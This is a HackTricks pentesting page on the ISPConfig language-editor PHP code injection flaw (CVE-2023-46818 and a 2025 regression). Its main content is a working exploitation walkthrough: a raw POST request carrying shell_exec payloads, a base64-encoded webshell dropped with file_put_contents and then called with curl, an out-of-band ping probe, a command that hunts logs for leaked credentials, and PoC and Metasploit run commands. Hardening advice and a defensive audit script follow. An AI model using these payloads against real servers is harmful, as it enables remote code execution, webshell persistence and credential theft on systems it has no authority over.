ISPConfig
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
ISPConfig is an open-source hosting control panel. Older 3.2.x releases shipped a language-file editor feature that, when enabled for the superadmin, allowed arbitrary PHP code injection through a malformed translation record. This can lead to RCE in the web server context and, depending on how PHP is run, to privilege escalation.
Key default paths:
- Web root is often /var/www/ispconfig when served with php -S or through Apache/nginx.
- The admin UI is reachable on the HTTP(S) vhost (sometimes bound to localhost only; use an SSH port-forward if needed).
Tip: if the panel is bound to localhost (e.g. 127.0.0.1:8080), forward it:
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
Language editor PHP code injection (CVE-2023-46818)
- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
- Preconditions:
  - Logged in as the built-in superadmin account admin (other roles are not affected, according to the vendor)
  - The language editor must be enabled: admin_allow_langedit=yes in /usr/local/ispconfig/security/security_settings.ini
- Impact: an authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, yielding RCE in the web context
References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.
Manual exploitation flow
- Open/create a language file to obtain CSRF tokens
Send a first POST to initialise the form and parse the CSRF fields (csrf_id, csrf_key) from the HTML response. Example request path: /admin/language_edit.php.
- Inject PHP via records[] and save
Send a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
Out-of-band test (watch for ICMP):
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
- Write files and drop a webshell
Use file_put_contents to create a file under a web-reachable path (for example, admin/):
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
Then write a simple webshell, using base64 to avoid bad characters in the POST body:
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
If PHP is executed as root (e.g., via php -S 127.0.0.1:8080 started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
2025 regression (ISPConfig 3.3.0 / 3.3.0p1)
The language editor bug reappeared in 3.3.0/3.3.0p1 and was fixed in 3.3.0p2. Preconditions are unchanged (admin_allow_langedit and an admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.
Notes:
- In 3.3.0/3.3.0p1, world-readable rotated logs under /usr/local/ispconfig/interface/log/ can leak credentials if debug logging was enabled:
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
- Exploit steps are the same as for CVE-2023-46818; 3.3.0p2 adds extra checks before a language edit.
Python PoC
A ready-made exploit automates token handling and payload delivery:
Example run:
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
Metasploit module (released July 2025)
Rapid7 added exploit/linux/http/ispconfig_lang_edit_php_code_injection, which can automatically enable admin_allow_langedit if the supplied admin account has system-config rights.
use exploit/linux/http/ispconfig_lang_edit_php_code_injection
set RHOSTS 10.10.10.50
set RPORT 8080
set USERNAME admin
set PASSWORD <admin_pass>
set TARGETURI /
run
The module writes a base64-encoded payload through records[] and executes it, delivering a PHP Meterpreter or a generic payload.
Hardening
- Update to 3.2.11p1 or later for the original issue, and to 3.3.0p2 or later for the 2025 regression.
- Disable the language editor unless it is strictly needed:
admin_allow_langedit=no
- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
- Enforce strong authentication for the built-in admin account
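As a defensive check to pair with these settings (an added example, not part of the original page or of ISPConfig's own tooling): a small Python audit that reports whether admin_allow_langedit is switched on in security_settings.ini and flags lines in a language (.lng) file that are not plain $wb['key'] = 'value'; assignments or that carry a PHP tag inside a translation value. The .lng layout and the [permissions] section name are assumptions; the sample inputs are constructed.

```python
import re

# Assumed .lng layout (not taken from the page): "<?php", one
# $wb['key'] = 'value'; assignment per line, then "?>".
LNG_LINE = re.compile(r"^\$wb\['[^']*'\]\s*=\s*'(?:[^'\\]|\\.)*';$")
PHP_TAG = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)


def langedit_enabled(ini_text: str) -> bool:
    """True when security_settings.ini turns the language editor on."""
    m = re.search(r"^\s*admin_allow_langedit\s*=\s*(\w+)", ini_text, re.MULTILINE)
    return bool(m) and m.group(1).lower() == "yes"


def suspicious_lng_lines(lng_text: str) -> list:
    """Return (line_no, reason) for lines that are not plain translations."""
    findings = []
    lines = lng_text.splitlines()
    for no, line in enumerate(lines, 1):
        s = line.strip()
        # Skip blanks and the expected opening/closing PHP tags.
        if not s or (no == 1 and s == "<?php") or (no == len(lines) and s == "?>"):
            continue
        if not LNG_LINE.match(s):
            findings.append((no, "not a $wb[...] = '...'; assignment"))
        elif PHP_TAG.search(s):
            findings.append((no, "PHP tag inside a translation value"))
    return findings


# Constructed samples (not real ISPConfig files).
SAMPLE_INI = "[permissions]\nadmin_allow_langedit=yes\n"
SAMPLE_LNG = (
    "<?php\n"
    "$wb['login_title'] = 'Login';\n"
    "$wb['note'] = 'It\\'s fine';\n"
    "$wb['hint'] = '<?php echo 1; ?>';\n"
    "<?php echo 'injected'; ?>\n"
    "?>\n"
)

if __name__ == "__main__":
    print("language editor enabled:", langedit_enabled(SAMPLE_INI))
    for no, reason in suspicious_lng_lines(SAMPLE_LNG):
        print(f"line {no}: {reason}")
```

Run it against the real files under /usr/local/ispconfig/ to confirm the editor is off and that no language file has been tampered with.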
References
- ISPConfig 3.2.11p1 Released (fixes language editor code injection)
- CVE-2023-46818 – NVD
- bipbopbup/CVE-2023-46818-python-exploit
- HTB Nocturnal: Root via ISPConfig language editor RCE
- ISPConfig 3.3.0p2 Released – Security Update
- CXSecurity WLB-2025070017 – Metasploit module for ISPConfig language_edit.php